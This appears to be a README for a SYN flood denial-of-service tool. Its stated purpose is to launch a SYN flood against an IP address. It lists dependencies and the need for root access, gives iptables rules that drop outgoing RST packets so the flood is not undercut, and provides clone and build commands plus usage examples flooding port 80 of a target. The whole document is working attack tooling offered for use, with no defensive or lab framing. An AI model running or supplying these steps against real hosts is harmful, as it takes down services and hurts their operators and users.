Start a SYN flood attack to an ip address.
-
libnet1.
libnet1-dev
under Debian. -
Root access for sending a packet.
-
Its recommended to block all RST packets from the source host on the source host.
iptables -I OUTPUT -p tcp --dport 80 --tcp-flags RST RST -j DROP iptables -I OUTPUT -p tcp --dport 80 --tcp-flags RST ACK -j DROP
-
Clone:
git clone https://github.com/TheFox/synflood.git
-
In
synflood
directory, make:mkdir -p build && cd build && cmake -DCMAKE_BUILD_TYPE=Release .. && make && make test
-
Done.
./synflood SRC DST DPT [CONNECTIONS]
SRC
: Source IP address.DST
: Destination IP address.DPT
: Destination port.CONNECTIONS
: Number of connections.
Examples:
./synflood 192.168.241.31 192.168.1.3 80
./synflood 192.168.241.31 192.168.1.3 80 1000